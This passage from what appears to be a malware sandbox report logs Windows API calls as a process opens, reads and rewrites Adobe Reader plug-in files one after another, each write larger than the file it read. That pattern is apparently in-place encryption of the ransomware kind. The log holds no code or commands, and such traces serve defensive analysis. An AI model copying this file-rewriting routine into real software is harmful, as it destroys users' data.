| out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0086.259] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2000 [0086.259] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0086.259] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.259] ReleaseMutex (hMutex=0x168) returned 1 [0086.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.DAN", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0086.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.DAN", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.DAN", lpUsedDefaultChar=0x0) returned 10 [0086.259] ReadFile (in: hFile=0x1fc, lpBuffer=0x26673c8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26673c8*, lpNumberOfBytesRead=0x2e9f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0086.877] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0086.877] WriteFile (in: hFile=0x1fc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0086.878] CloseHandle (hObject=0x1fc) returned 1 [0086.878] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.mpp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.mpp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0086.879] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0086.879] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x16e00 [0086.879] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0086.879] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.879] ReleaseMutex (hMutex=0x168) returned 1 [0086.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.mpp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0086.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.mpp", cchWideChar=10, lpMultiByteStr=0x1f733cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MCIMPP.mpp", lpUsedDefaultChar=0x0) returned 10 [0086.879] ReadFile (in: hFile=0x1fc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0086.881] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x15e00 [0086.882] ReadFile (in: hFile=0x1fc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.955] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x15e00 [0086.955] WriteFile (in: hFile=0x1fc, lpBuffer=0x2888e18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2888e18*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.956] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0086.956] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0086.956] CloseHandle (hObject=0x1fc) returned 1 [0086.977] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0086.978] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0086.978] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa00 [0086.978] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0086.978] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.978] ReleaseMutex (hMutex=0x168) returned 1 [0086.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.CHT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0086.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.CHT", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.CHT", lpUsedDefaultChar=0x0) returned 13 [0086.979] ReadFile (in: hFile=0x1fc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x2e9f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0087.028] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0087.028] WriteFile (in: hFile=0x1fc, lpBuffer=0x26679c8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26679c8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0087.028] CloseHandle (hObject=0x1fc) returned 1 [0087.029] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0087.029] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0087.029] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa00 [0087.029] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0087.029] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.029] ReleaseMutex (hMutex=0x168) returned 1 [0087.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.KOR", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0087.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.KOR", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.KOR", lpUsedDefaultChar=0x0) returned 13 [0087.029] ReadFile (in: hFile=0x1fc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x2e9f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0087.122] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0087.122] WriteFile (in: hFile=0x1fc, lpBuffer=0x26679c8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26679c8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0087.122] CloseHandle (hObject=0x1fc) returned 1 [0087.122] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0087.123] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0087.123] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa00 [0087.123] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0087.124] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.124] ReleaseMutex (hMutex=0x168) returned 1 [0087.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.CHS", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.CHS", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.CHS", lpUsedDefaultChar=0x0) returned 16 [0087.124] ReadFile (in: hFile=0x1fc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x2e9f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0087.226] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0087.227] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2e9f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0087.227] CloseHandle (hObject=0x1fc) returned 1 [0087.227] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0087.228] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0087.228] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa00 [0087.228] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0087.228] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.228] ReleaseMutex (hMutex=0x168) returned 1 [0087.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.JPN", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.JPN", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.JPN", lpUsedDefaultChar=0x0) returned 16 [0087.228] ReadFile (in: hFile=0x1fc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x2e9f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0088.247] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0088.247] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2e9f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0088.247] CloseHandle (hObject=0x1fc) returned 1 [0088.248] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\Flash.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\flash.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0088.249] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0088.249] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa00 [0088.249] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0088.249] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.250] ReleaseMutex (hMutex=0x168) returned 1 [0088.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.CZE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0088.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.CZE", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.CZE", lpUsedDefaultChar=0x0) returned 9 [0088.250] ReadFile (in: hFile=0x1fc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x2e9f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0088.326] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0088.326] WriteFile (in: hFile=0x1fc, lpBuffer=0x28a19d8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28a19d8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0088.327] CloseHandle (hObject=0x1fc) returned 1 [0088.327] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\Flash.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\flash.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0088.328] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0088.328] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa00 [0088.328] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0088.328] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.328] ReleaseMutex (hMutex=0x168) returned 1 [0088.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.HUN", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0088.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.HUN", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.HUN", lpUsedDefaultChar=0x0) returned 9 [0088.329] ReadFile (in: hFile=0x1fc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x2e9f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0088.412] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0088.413] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0088.413] CloseHandle (hObject=0x1fc) returned 1 [0088.413] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\Flash.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\flash.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0088.414] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0088.414] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa00 [0088.414] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0088.414] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.415] ReleaseMutex (hMutex=0x168) returned 1 [0088.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.RUM", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0088.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.RUM", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.RUM", lpUsedDefaultChar=0x0) returned 9 [0088.415] ReadFile (in: hFile=0x1fc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x2e9f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0088.682] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0088.682] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x2e9f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0088.682] CloseHandle (hObject=0x1fc) returned 1 [0088.682] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\Flash.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\flash.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0088.683] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0088.683] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa00 [0088.683] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0088.683] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.683] ReleaseMutex (hMutex=0x168) returned 1 [0088.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.SKY", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0088.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.SKY", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.SKY", lpUsedDefaultChar=0x0) returned 9 [0088.684] ReadFile (in: hFile=0x1fc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x2e9f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0088.695] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0088.695] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x2e9f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0088.695] CloseHandle (hObject=0x1fc) returned 1 [0088.695] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\Flash.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\flash.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0088.696] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 